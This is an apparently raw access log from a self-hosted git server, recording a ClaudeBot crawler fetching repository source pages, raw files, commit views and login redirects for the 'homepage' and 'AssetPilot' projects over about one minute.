"/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10889] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 216.73.216.188] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10873] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata" [Client 216.73.216.188] [Length 23402] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 216.73.216.188] [Length 11021] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10871] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11494] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fupdate_status.py" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=800" [Client 216.73.216.188] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr 